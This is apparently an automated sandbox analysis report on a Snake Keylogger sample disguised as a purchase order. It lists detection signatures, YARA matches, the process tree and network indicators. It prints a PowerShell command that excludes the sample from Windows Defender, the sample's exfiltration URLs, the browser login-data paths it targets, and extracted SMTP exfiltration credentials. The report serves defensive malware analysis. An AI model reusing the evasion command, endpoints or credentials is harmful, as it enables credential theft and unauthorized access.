Windows Analysis Report
ORDEM DE COMPRA.exe

Overview

General Information

Sample name:ORDEM DE COMPRA.exe
Analysis ID:1446502
MD5:46dab257847ea9cfbbc77979323212c4
SHA1:8cbd33b3cf519807b2c986f7fbe3daae4175595f
SHA256:1f522609abaf12c6647c56b379cdf2c9263a845a6b4c93bac7111d0c27d68159
Tags:exe

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ORDEM DE COMPRA.exe (PID: 1756 cmdline: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" MD5: 46DAB257847EA9CFBBC77979323212C4)
    • powershell.exe (PID: 6084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • AddInProcess32.exe (PID: 6976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 4508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 2732 cmdline: C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "divine4040@gbogboro.com", "Password": "Egoamaka@123", "Host": "mail.gbogboro.com", "Port": "587"}
Source: 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown | Strings:
  • 0x148fe:$a1: get_encryptedPassword
  • 0x14bf4:$a2: get_encryptedUsername
  • 0x1470a:$a3: get_timePasswordChanged
  • 0x14805:$a4: get_passwordField
  • 0x14914:$a5: set_encryptedPassword
  • 0x15f1b:$a7: get_logins
  • 0x15e7e:$a10: KeyLoggerEventArgs
  • 0x15b17:$a11: KeyLoggerEventArgsEventHandler
Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen | Strings:
  • 0x18244:$x1: $%SMTPDV$
  • 0x182a8:$x2: $#TheHashHere%&
  • 0x198c3:$x3: %FTPDV$
  • 0x199ad:$x4: $%TelegramDv$
  • 0x15b17:$x5: KeyLoggerEventArgs
  • 0x15e7e:$x5: KeyLoggerEventArgs
  • 0x198e7:$m2: Clipboard Logs ID
  • 0x19aa9:$m2: Screenshot Logs ID
  • 0x19b75:$m2: keystroke Logs ID
  • 0x19a81:$m4: \SnakeKeylogger\
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown | Strings:
  • 0x14afe:$a1: get_encryptedPassword
  • 0x14df4:$a2: get_encryptedUsername
  • 0x1490a:$a3: get_timePasswordChanged
  • 0x14a05:$a4: get_passwordField
  • 0x14b14:$a5: set_encryptedPassword
  • 0x1611b:$a7: get_logins
  • 0x1607e:$a10: KeyLoggerEventArgs
  • 0x15d17:$a11: KeyLoggerEventArgsEventHandler
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth | Strings:
  • 0x1c3cb:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1b5fd:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1ba30:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1ca6f:$a5: \Kometa\User Data\Default\Login Data

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe", ParentImage: C:\Users\user\Desktop\ORDEM DE COMPRA.exe, ParentProcessId: 1756, ParentProcessName: ORDEM DE COMPRA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, ProcessId: 6084, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe", ParentImage: C:\Users\user\Desktop\ORDEM DE COMPRA.exe, ParentProcessId: 1756, ParentProcessName: ORDEM DE COMPRA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, ProcessId: 6084, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe", ParentImage: C:\Users\user\Desktop\ORDEM DE COMPRA.exe, ParentProcessId: 1756, ParentProcessName: ORDEM DE COMPRA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, ProcessId: 6084, ProcessName: powershell.exe
              No Snort rule has matched


              AV Detection

Source: https://scratchdreams.tk | Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS | Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk | Avira URL Cloud: Label: malware
Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "divine4040@gbogboro.com", "Password": "Egoamaka@123", "Host": "mail.gbogboro.com", "Port": "587"}
Source: scratchdreams.tk | Virustotal: Detection: 18%
Source: https://scratchdreams.tk/_send_.php?TS | Virustotal: Detection: 16%
Source: http://scratchdreams.tk | Virustotal: Detection: 18%
Source: https://scratchdreams.tk | Virustotal: Detection: 17%
Source: ORDEM DE COMPRA.exe | Virustotal: Detection: 25%
Source: ORDEM DE COMPRA.exe | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: ORDEM DE COMPRA.exe | Joe Sandbox ML: detected

              Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

              Exploits

Source: Yara match | File source: 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49700 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: ORDEM DE COMPRA.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Windows.Forms.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.CSharp.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Dynamic.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdb0 source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb` source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.pdbMZ source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERE5FE.tmp.dmp.9.dr

              Networking

Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /_send_.php?TS HTTP/1.1 | Host: scratchdreams.tk | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 132.226.8.169
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49700 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: scratchdreams.tk
Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003169000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://scratchdreams.tk
Source: Amcache.hve.9.dr | String found in binary or memory: http://upx.sf.net
Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.0
Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175$
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.2

              System Summary

              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A5D25 | 0_2_00007FFD348A5D25
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348A5CA8 | 0_2_00007FFD348A5CA8
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Code function: 0_2_00007FFD348D1658 | 0_2_00007FFD348D1658
